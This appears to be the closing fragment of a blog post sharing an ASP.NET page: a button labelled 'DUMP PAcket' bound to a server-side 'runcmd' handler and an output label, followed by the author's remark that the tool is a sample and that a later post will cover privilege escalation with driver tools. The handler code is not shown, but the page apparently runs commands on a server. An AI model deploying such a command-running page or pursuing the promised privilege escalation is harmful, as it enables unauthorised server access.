<asp:Button id=”Button” style=”BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; COLOR: #ffffff; BORDER-BOTTOM: #084b8e 1px solid; BACKGROUND-COLOR: #000000″ onclick=”runcmd” runat=”server” Width=”100px” Text=”DUMP PAcket”></asp:Button>
<p>
<asp:Label id=”result” style=”COLOR: #0000ff” runat=”server”></asp:Label>
</p>
</form>

this tools is sample .

in future i speak about how to Privilege escalation with kartoffell tools in drivers .;)